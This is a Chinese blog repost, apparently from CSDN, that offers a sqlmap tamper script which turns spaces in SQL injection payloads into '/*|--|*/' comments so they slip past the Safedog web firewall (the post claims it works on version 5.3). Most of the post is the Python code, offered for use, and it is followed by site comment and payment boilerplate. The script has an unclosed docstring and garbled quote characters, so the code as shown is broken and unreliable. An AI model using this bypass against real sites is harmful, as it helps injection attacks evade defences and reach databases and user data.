sqlmap tamper mysql_sqlmap tamper绕过安全狗

本文介绍了如何使用sqlmap的tamper模块来绕过安全狗防护,特别是针对MySQL 5.3版本。提供了一个Python脚本,该脚本将空格替换为注释,以避免被防火墙拦截。此方法已成功测试于多种数据库系统,如Microsoft SQL Server 2005、MySQL不同版本、Oracle 10g和PostgreSQL等。

可以过5.3版本 放出py

#!/usr/bin/env python

"""

Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)

See the file ‘doc/COPYING‘ for copying permission

"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():

pass

def tamper(payload, **kwargs):

"""

Replaces space character (‘ ‘) with comments ‘/*|--|*/‘

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

* Useful to bypass weak and bespoke web application firewalls

>>> tamper(‘SELECT id FROM users‘)

‘SELECT/*|--|*/id/*|--|*/FROM/*|--|*/users‘

retVal = payload

if payload:

retVal = ""

quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):

if not firstspace:

if payload[i].isspace():

firstspace = True

retVal += "/*|--|*/"

continue

elif payload[i] == ‘\‘‘:

quote = not quote

elif payload[i] == ‘"‘:

doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:

retVal += "/*|--|*/"

continue

retVal += payload[i]

return retVal本文转自:http://www.silic.top/index.php/archives/6/

原文:http://www.cnblogs.com/dongchi/p/5079135.html

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值